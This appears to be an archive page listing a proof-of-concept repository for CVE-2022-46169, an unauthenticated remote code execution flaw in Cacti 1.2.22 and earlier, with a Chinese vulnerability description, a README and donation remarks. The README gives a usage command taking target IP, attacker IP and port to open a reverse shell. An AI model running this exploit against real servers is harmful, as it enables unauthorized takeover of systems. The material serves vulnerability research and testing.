Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-46169 PoC — Cacti 命令注入漏洞

Source
Associated Vulnerability
Title:Cacti 命令注入漏洞 (CVE-2022-46169)
Description:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti v1.2.22版本存在命令注入漏洞,该漏洞源于未经身份验证的命令注入,允许未经身份验证的用户在运行Cacti的服务器上执行任意代码。
Description
Improved PoC for Unauthenticated RCE on Cacti <= 1.2.22 - CVE-2022-46169
Readme
# CVE-2022-46169

This repository contains a Proof of Concept (PoC) for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22. You can read more about the vulnerability [here](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/). The script adds a reverse shell handler and is based on the code written by sAsPeCt488. You can view the original code [here](https://github.com/sAsPeCt488/CVE-2022-46169/blob/main/CVE-2022-46169.py).

### Usage
```
python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444

Arguments:
-t : Target IP address 
-i : Attacker system IP Address
-p : Port for reverse shell
```
![image](https://user-images.githubusercontent.com/38681779/235741029-614e629c-3bd3-42db-8327-f5a6c2499ac6.png)

# Credits
* Steven Seeley (mr_me) for discovering the exploit
File Snapshot

[4.0K] /data/pocs/0a8be85e36c63b830491515aa4b01fc13a406506 ├── [1.7K] CVE-2022-46169.py ├── [ 18K] LICENSE └── [ 816] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.